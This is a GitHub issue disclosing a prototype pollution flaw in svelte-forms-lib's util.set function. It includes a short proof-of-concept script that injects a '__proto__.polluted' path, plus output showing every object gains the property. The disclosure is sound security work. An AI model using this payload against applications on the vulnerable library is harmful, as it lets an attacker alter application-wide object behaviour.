Skip to content

Prototype Pollution #165

New issue
New issue
Open
Open
Prototype Pollution#165
Labels
bugSomething isn't working
@ready-research

Description

@ready-research
ready-research
opened on May 10, 2022

Summary

svelte-forms-lib package is vulnerable to Prototype Pollution. The set function fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, causing the addition or modification of an existing property on all objects.
Reported in huntr https://www.huntr.dev/bounties/69aa6433-5e43-4a2c-a4e1-3671c255b11e/ (8 months ago)
Please validate this using Mark as valid. Thanks.

Steps to reproduce

// poc.mjs
import {util} from 'svelte-forms-lib/lib/util.js';
const obj = {};
console.log("Before : " + {}.polluted);
util.set(obj, "__proto__.polluted", 'Yes! Its Polluted');
console.log("After : " + {}.polluted);

Result:

Before : undefined
After : Yes! Its Polluted

Example Project

What is the current bug behavior?

What is the expected correct behavior?

Relevant logs and/or screenshots

Possible fixes

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions